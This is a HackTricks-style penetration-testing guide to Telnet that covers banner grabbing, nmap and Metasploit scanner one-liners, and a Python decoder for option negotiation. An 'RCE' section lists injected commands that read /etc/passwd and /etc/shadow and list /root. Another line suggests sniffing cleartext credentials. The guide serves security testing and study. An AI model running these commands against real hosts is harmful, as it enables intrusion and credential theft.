hacktricks/network-services-pentesting/pentesting-telnet.md


Basic Information

Telnet is a network protocol that gives users an insecure way to access a computer over a network.

Default port: 23

```
23/tcp open  telnet
```

Enumeration

Banner Grabbing

```bash
nc -vn <IP> 23
```

All the interesting enumeration can be performed by nmap:

```bash
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
```

The script telnet-ntlm-info.nse will obtain NTLM information (Windows versions).

In the TELNET Protocol there are various "options" that will be sanctioned and may be used with the "DO, DON'T, WILL, WON'T" structure to allow a user and server to agree to use a more elaborate (or perhaps just different) set of conventions for their TELNET connection. Such options could include changing the character set, the echo mode, etc. (From the telnet RFC)
I know it's possible to enumerate these options but I don't know how, so let me know if you know how.
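The negotiation described above, decoded in code: this is an added example (not from this page or from HackTricks) that splits a raw Telnet byte stream into its IAC DO/DONT/WILL/WONT/SB options and the cleartext data, and flags when neither AUTHENTICATION nor ENCRYPT was negotiated, which is exactly the situation in which a capture filtered with tcp.port == 23 shows the login in the clear. The option-name table is a subset of the registered Telnet options and the server greeting is a constructed sample, not captured traffic.

```python
IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240
VERB = {DO: "DO", DONT: "DONT", WILL: "WILL", WONT: "WONT"}
OPTIONS = {0: "BINARY", 1: "ECHO", 3: "SUPPRESS-GO-AHEAD", 5: "STATUS",
           24: "TERMINAL-TYPE", 31: "NAWS", 32: "TERMINAL-SPEED",
           34: "LINEMODE", 35: "X-DISPLAY-LOCATION", 37: "AUTHENTICATION",
           38: "ENCRYPT", 39: "NEW-ENVIRON"}

# Constructed sample of a telnetd-style greeting as it appears on the wire.
SAMPLE_GREETING = (
    b"\xff\xfd\x18"              # IAC DO TERMINAL-TYPE
    b"\xff\xfd\x1f"              # IAC DO NAWS
    b"\xff\xfb\x03"              # IAC WILL SUPPRESS-GO-AHEAD
    b"\xff\xfb\x01"              # IAC WILL ECHO
    b"\xff\xfa\x18\x01\xff\xf0"  # IAC SB TERMINAL-TYPE SEND IAC SE
    b"Ubuntu 22.04 LTS\r\nlogin: "
)

def decode_telnet(stream: bytes):
    """Return ([(verb, option), ...], cleartext_bytes); unknown options are OPT-<n>."""
    negotiations, data, i, n = [], bytearray(), 0, len(stream)
    while i < n:
        if stream[i] != IAC:                       # ordinary data byte
            data.append(stream[i]); i += 1
            continue
        if i + 1 >= n: break                       # lone IAC at end: truncated
        cmd = stream[i + 1]
        if cmd == IAC:                             # IAC IAC = literal 0xff byte
            data.append(IAC); i += 2
        elif cmd in VERB:                          # 3-byte DO/DONT/WILL/WONT
            if i + 2 >= n: break                   # truncated command, drop it
            opt = stream[i + 2]
            negotiations.append((VERB[cmd], OPTIONS.get(opt, f"OPT-{opt}")))
            i += 3
        elif cmd == SB:                            # subnegotiation up to IAC SE
            end = stream.find(bytes([IAC, SE]), i + 2)
            if end < 0: break                      # unterminated SB, drop it
            opt = stream[i + 2]
            negotiations.append(("SB", OPTIONS.get(opt, f"OPT-{opt}")))
            i = end + 2
        else:
            i += 2                                 # NOP, GA, AYT, ... (2 bytes)
    return negotiations, bytes(data)

def cleartext_login_expected(negotiations) -> bool:
    """True when neither AUTHENTICATION nor ENCRYPT was offered or requested."""
    offered = {opt for verb, opt in negotiations if verb in ("WILL", "DO")}
    return not ({"AUTHENTICATION", "ENCRYPT"} & offered)
```

Feed it the bytes read from `nc -vn <IP> 23` (or a TCP stream exported from Wireshark) and the first element of the result is the option list the note above asks about.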

Brute force

Config file

```
/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet
```

HackTricks Automatic Commands

Telnet

Banner Grabbing

Using Nmap

```bash
nmap -sV --script=banner -p <port> <ip>
```

Using Telnet

```bash
telnet <ip> <port>
```

Authentication Bypass

Null Session

```bash
telnet <ip> <port>
GET / HTTP/1.0
```

Backdoor

```bash
telnet <ip> <port>
```
Remote Code Execution

```bash
telnet <ip> <port>
;id
;uname -a
;cat /etc/passwd
;cat /etc/shadow
;ls -ahl /home
;ls -ahl /root
```

```yaml
Protocol_Name: Telnet    #Protocol Abbreviation if there is one.
Port_Number:  23         #Comma separated if there is more than one.
Protocol_Description: Telnet    #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for t=Telnet
  Note: |
    wireshark to hear creds being passed
    tcp.port == 23 and ip.addr != myip

    https://book.hacktricks.xyz/pentesting/pentesting-telnet

Entry_2:
  Name: Banner Grab
  Description: Grab Telnet Banner
  Command: nc -vn {IP} 23

Entry_3:
  Name: Nmap with scripts
  Description: Run nmap scripts for telnet
  Command: nmap -n -sV -Pn --script "telnet" -p 23 {IP}

Entry_4:
  Name: consoleless mfs enumeration
  Description: Telnet enumeration without the need to run msfconsole
  Note: sourced from https://github.com/carlospolop/legion
  Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'
```

